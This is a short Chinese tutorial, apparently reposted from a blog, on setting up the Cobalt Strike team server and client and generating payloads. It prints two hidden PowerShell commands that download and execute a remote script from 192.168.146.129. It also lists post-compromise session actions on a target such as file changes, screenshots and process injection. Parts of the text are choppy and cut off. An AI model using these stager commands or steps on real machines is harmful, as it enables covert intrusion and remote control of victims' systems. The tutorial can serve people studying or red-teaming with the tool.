cobaltr strike入门使用教程-1

前言

Cobalt Strike分为服务端和客户端两个部分从而实现分布式操作,协同作战。工具有linux和windows版本。

1.创建服务端

找到解压目录进入

./teamserver [IP] [password]

cobaltr strike入门使用教程-1_第1张图片

2.创建客户端

运行cobaltstrike,在host字段输入ip,user字段随便写,password,port是开启端口,默认50050。

​ ./cobaltstrike

cobaltr strike入门使用教程-1_第2张图片

荷,并与监听器绑定。

  1. PowerShell生成:
  2. windows Excecutable

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.146.129:80/a'))"

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.146.129:801/a'))"

Sessoin使用。

可以对目标机器上文件进行删除增加修改。右键需要操作的session,进行文件操作,截屏,进程注入等。

转载于:https://www.cnblogs.com/NBeveryday/p/cs_1.html

你可能感兴趣的:(cobaltr strike入门使用教程-1)